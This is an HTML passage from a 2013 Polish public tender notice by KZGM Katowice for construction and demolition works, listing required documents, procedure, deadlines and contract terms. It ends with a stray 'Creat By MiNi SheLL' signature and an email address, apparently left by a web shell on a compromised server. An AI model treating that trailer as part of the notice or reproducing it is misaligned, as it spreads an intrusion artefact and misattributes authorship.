<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony Formularz ofertowy - Załącznik nr 1 do SIWZ; 
b)	pełnomocnictwo do reprezentowania Wykonawcy (podpisującego ofertę) - pełnomocnictwo należy dołączyć w oryginale bądź kopii notarialnie potwierdzonej za zgodność z oryginałem;
c)	zakres zamówienia jaki zostanie powierzony podwykonawcom - Załącznik nr 7 do SIWZ - jeżeli dotyczy;
d)	kosztorys ofertowy uproszczony wraz z zestawieniem materiałów, sporządzony na podstawie przedmiarów robót (Załącznik nr 9 do SIWZ); 
UWAGA! Zamawiający zaleca sporządzenie kosztorysu ofertowego składających się       z osobnych kosztorysów odpowiadających  poszczególnym przedmiarom oraz nadanie im nazw zgodnie z tytułami załączonych przedmiarów.
e)	pisemne zobowiązanie - w oryginale - podmiotu trzeciego do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeśli dotyczy. 
f)	Oświadczenie o akceptacji warunków płatności określonych przez Zamawiającego - zgodnie z Załącznikiem nr 1 do SIWZ;
g)	Oświadczenie o zapoznaniu się z warunkami zamówienia i ich akceptacji bez zastrzeżeń    - zgodnie z Załącznikiem nr 1 do SIWZ;
h)	Oświadczenie o związaniu ofertą na czas wskazany w specyfikacji - zgodnie z Załącznikiem nr 1 do SIWZ;
i)	Oświadczenie o zapoznaniu się z wzorem umowy i akceptacji bez zastrzeżeń - zgodnie z Załącznikiem nr 1 do SIWZ;
j)	Oświadczenie, iż oferowany przedmiot zamówienia jest zgodny z wymaganiami i warunkami opisanymi w ustawie oraz określonymi przez zamawiającego w SIWZ             -  zgodnie z Załącznikiem nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w zakresie określonym w § 19 Wzoru umowy stanowiącego Załącznik nr 8 do SIWZ oraz w zakresie:
- zmian dotyczących osób odpowiedzialnych za realizację zamówienia, zarówno ze strony Zamawiającego jak i Wykonawcy, 
- terminu realizacji ze względu na panujące warunki atmosferyczne,
- terminu realizacji w przypadku wystąpienia uznanych robót dodatkowych.
Zmiany wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kzgm.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Organizacji Przetargów,
ul. Mieszka I 2,
40-877 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 07:45, miejsce: Katowice, ul. Grażyńskiego 5 - sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Dotyczy sekcji III.4.1) punktor 1 Dowodami, o których mowa zgodnie z § 1 ust. 2 pkt 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013r., poz. 231) są: 
- poświadczenie określające, czy roboty budowlane wykonane zostały w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 
- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. 
UWAGA! W przypadku, gdy Zamawiający - KZGM w Katowicach - jest podmiotem, na rzecz którego zostały wykonane roboty budowlane wskazane w wykazie wykonanych robót budowlanych (Załącznik nr 5 do SIWZ), Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. W przypadku, gdy KZGM w Katowicach jest podmiotem, na rzecz którego zostały wykonane roboty budowlane należy zaznaczyć to w wykazie wykonanych robót budowlanych - Załącznik nr 5 do SIWZ.
Dopuszcza się możliwość złożenia w miejsce poświadczenia, o którym mowa wyżej dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje) zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz.U. Nr 226, poz. 1817).
 III.4.1) punktor 3
- z uwagi na opis sposobu dokonania oceny spełniania warunków udziału w postępowaniu zamawiający nie wymaga podania wykształcenia osób w wykazie osób, które będą uczestniczyć w wykonaniu zamówienia. 
II. 1.	Termin wykonania całości zamówienia: 12 miesięcy od dnia podpisania umowy.
2. Termin zakończenia robót rozbiórkowych wraz z operatem geodezyjnym: 3 miesiące od dnia podpisania umowy.
3. Zamawiający przekaże Wykonawcy teren budowy: do 14 dni od dnia podpisania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com